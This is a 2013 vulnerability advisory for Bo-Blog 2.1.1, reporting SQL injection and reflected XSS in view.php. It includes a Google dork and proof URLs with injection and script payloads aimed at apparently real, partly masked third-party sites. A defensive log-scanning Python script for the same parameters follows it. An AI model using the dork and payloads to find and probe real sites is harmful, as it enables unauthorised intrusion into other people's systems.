Bo-Blog 2.1.1 Multiple Vulnerabilities
Posted on 21 August 2013
<pre>
# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilities
#****************************************************************************
# Exploit Author : Ashiyane Digital Security Team
#************************************************
# Official site : http://www.bo-blog.com/
# Tested on: Windows,Linux
#*************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"
#///////////////////////////////////////////////
#
# Exploit 1 : SQL Injection
#
# Location : /view.php?go=userlist&ordered=1[SQL Injection]
#
#
# Proof:
#
# http://www.lanXwilson.com//view.php?go=userlist&ordered=1%27
#
# http://itaXlog.com/view.php?go=userlist&ordered=1%27
#
# http://www.lanXywilson.com//view.php?go=userlist&ordered=1%27
#
# http://www.9Xoy.com/view.php?go=userlist&ordered=1%27
#
# http://www.hXgcn.com/en/view.php?go=userlist&ordered=1%27
-----------------------------------------------------------------------------
# Exploit 2 : Cross-site scripting
#
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]
#
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]
#
#
# Proof:
#
# http://itaXlog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# www.landsXilson.com//view.php?go=userlist&ordered=1&usergroup= "/><script>alert(1);</script>
#
# http://www.bXboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://itlifeX5.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
##############-------- discovered by : ACC3SS ##############--------
</pre>
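A defender-side check for the two parameters named in the advisory, as an added example that is not part of the original post or of Bo-Blog: it scans web access logs for `view.php?go=userlist` requests whose `ordered` value is not a plain integer or whose `usergroup` value carries quotes or angle brackets. The combined log format, the function names and the sample log lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qs

# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
MARKUP_RE = re.compile(r"[<>\"']")


def classify(target):
    """Return the findings for one request target (path plus query string)."""
    # Split by hand: urlsplit() would read the advisory's "//view.php" as a host.
    path, _, query = target.partition("?")
    if not path.lower().endswith("/view.php"):
        return set()
    # parse_qs percent-decodes, so %27 and %3C are checked as ' and <.
    params = parse_qs(query, keep_blank_values=True)
    if "userlist" not in params.get("go", []):
        return set()
    findings = set()
    # Assumption: a legitimate 'ordered' value is a plain decimal integer.
    if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("ordered", [])):
        findings.add("ordered-not-integer")
    # Assumption: a legitimate 'usergroup' value never holds quotes or angle brackets.
    if any(MARKUP_RE.search(v) for v in params.get("usergroup", [])):
        findings.add("usergroup-markup")
    return findings


def scan(lines):
    """Return (line number, sorted findings) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = classify(match.group(1)) if match else set()
        if found:
            hits.append((number, sorted(found)))
    return hits


# Constructed sample log; addresses are documentation ranges, not real clients.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2013:10:00:01 +0000] "GET /view.php?go=userlist&ordered=1 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [21/Aug/2013:10:00:05 +0000] "GET //view.php?go=userlist&ordered=1%27 HTTP/1.1" 200 812',
    '192.0.2.11 - - [21/Aug/2013:10:00:09 +0000] "GET /blog//view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 5300',
    '192.0.2.12 - - [21/Aug/2013:10:00:12 +0000] "GET /index.php?ordered=1%27 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

The same two rules (integer-only `ordered`, no markup characters in `usergroup`) can be enforced at a reverse proxy or in the application's input handling until the blog software is patched or replaced.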
